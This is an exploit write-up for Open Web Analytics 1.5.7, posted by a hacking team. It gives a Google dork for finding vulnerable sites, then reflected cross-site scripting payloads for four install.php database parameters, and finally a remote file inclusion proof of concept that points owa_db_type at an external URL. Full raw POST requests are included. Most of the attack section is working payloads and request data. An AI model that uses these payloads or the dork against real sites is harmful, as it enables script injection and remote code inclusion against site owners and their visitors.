##################################################################################################
#
#Exploit Title : Open Web Analytics - v: 1.5.7 multiple vulnerability 
#Author        : Govind Singh aka NullPort
#Vendor        : http://www.openwebanalytics.com/
#Download Link : http://downloads.openwebanalytics.com/
#Google Dork   : "powered by Open Web Analytics" 
#Date          : 14/07/2014
#Discovered at : IHT Lab ( 1ND14N H4X0R5 T34M )
#Love to       : Manish Tanwar, DeadMan India, Hardeep Singh, Amit Kumar Achina , Jitender Dangi
#Greez to      : All IHT Members 
#           
###################################################################################################

about vendor :
-+-+-+-+-+-+-+-+-+-+-+-+-+
Open Web Analytics (OWA) is open source web analytics software that you can use to track and analyze how people use your websites and applications. 
OWA also comes with built-in support for tracking websites made with popular content management frameworks such as WordPress and MediaWiki.

1.) Reflected Xss 

Reflected Cross-Site Scripting in "install.php" in parameter "owa_db_host" "owa_db_name" "owa_db_password" "owa_db_user" 

PoC : 

owa_db_host= 
payload :: 127" onmouseover=prompt(901496) bad="
+++++++++++++++++++++++++++++++++++++++++++++++
owa_db_name= 
payload :: indiancrew" onmouseover=prompt(979236) bad="
+++++++++++++++++++++++++++++++++++++++++++++++
owa_db_password 
payload : 1ND14NH4X0R5T34M" onmouseover=prompt(911667) bad="
+++++++++++++++++++++++++++++++++++++++++++++++
owa_db_user
payload : 1" onmouseover=prompt(925045) bad="
+++++++++++++++++++++++++++++++++++++++++++++++

Host=localhost
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=http://localhost/owa/install.php?owa_action=base.installCheckEnv
Cookie=PHPSESSID=c38l3ugid396b5g9fbeeg4qba2
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=256
POSTDATA=owa_public_url=http%3A%2F%2Flocalhost%2Fowa%2F&owa_db_type=mysql&owa_db_host=127" onmouseover=prompt(901496) bad="&owa_db_name=null&owa_db_user=nullport&owa_db_password=IndianCrew&owa_nonce=f6466bb4c4&owa_action=base.installConfig&owa_save_button=Continue...
---------------------------------------------------------------------------------------------------------

2.) Remote File Inclusion

PoC :
"install.php" file inclusion when URL encoded POST input "owa_db_type" was set to https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-xpa1/t1.0-9/1098413_154775491385294_984206350_n.jpg

Host=localhost
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=http://localhost/owa/install.php?owa_action=base.installCheckEnv
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=321
POSTDATA=owa_public_url=http%3A%2F%2Flocalhost%2Fowa%2F&owa_db_type=https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-xpa1/t1.0-9/1098413_154775491385294_984206350_n.jpg&owa_db_host=localhost&owa_db_name=owa&owa_db_user=Null&owa_db_password=IndianCrew&owa_nonce=64a1c7957f&owa_action=base.installConfig&owa_save_button=Continue...

PoC imz :: http://i59.tinypic.com/2q00hgi.jpg